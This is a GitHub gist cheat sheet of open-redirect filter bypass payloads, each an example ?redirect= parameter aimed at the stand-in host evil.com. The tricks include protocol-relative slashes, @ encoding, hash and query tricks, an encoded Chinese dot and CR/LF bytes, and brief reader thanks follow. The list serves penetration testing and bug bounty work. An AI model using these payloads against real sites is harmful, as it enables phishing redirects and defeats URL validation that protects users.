-
Simply try to change the domain
Example: ?redirect=https://example.com --> ?redirect=https://evil.com
-
Bypass the filter when protocol is blacklisted using
//Example: ?redirect=https://example.com --> ?redirect=//evil.com
-
Bypass the filter when double slash is blacklisted using
\\Example: ?redirect=https://example.com --> ?redirect=\evil.com
-
Bypass the filter when double slash is blacklisted using
http:orhttps:Example: ?redirect=https://example.com --> ?redirect=https:example.com
-
Bypass the filter using
%40Example: ?redirect=example.com --> ?redirect=example.com%40evil.com
-
Bypass the filter if it only checks for domain name
Example: ?redirect=example.com --> ?redirect=example.comevil.com
-
Bypass the filter if it only checks for domain name using a dot
%2eExample: ?redirect=example.com --> ?redirect=example.com%2eevil.com
-
Bypass the filter if it only checks for domain name using a query/question mark
?Example: ?redirect=example.com --> ?redirect=evil.com?example.com
-
Bypass the filter if it only checks for domain name using a hash
%23Example: ?redirect=example.com --> ?redirect=evil.com%23example.com
-
Bypass the filter using a
°symbolExample: ?redirect=example.com --> ?redirect=example.com/°evil.com
-
Bypass the filter using a url encoded Chinese dot
%E3%80%82Example: ?redirect=example.com --> ?redirect=evil.com%E3%80%82%23example.com
-
Bypass the filter if it only allows you to control the path using a nullbyte
%0dor%0aExample: ?redirect=/ --> ?redirect=/%0d/evil.com
Created
April 1, 2021 19:04
-
-
Save 0xblackbird/d7677a05ea50586cf2be0a601e665d1a to your computer and use it in GitHub Desktop.
Open redirect bypasses
helpfull
insabat
Thanks!
Chinese dot! So interesting!
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
You're welcome! ;)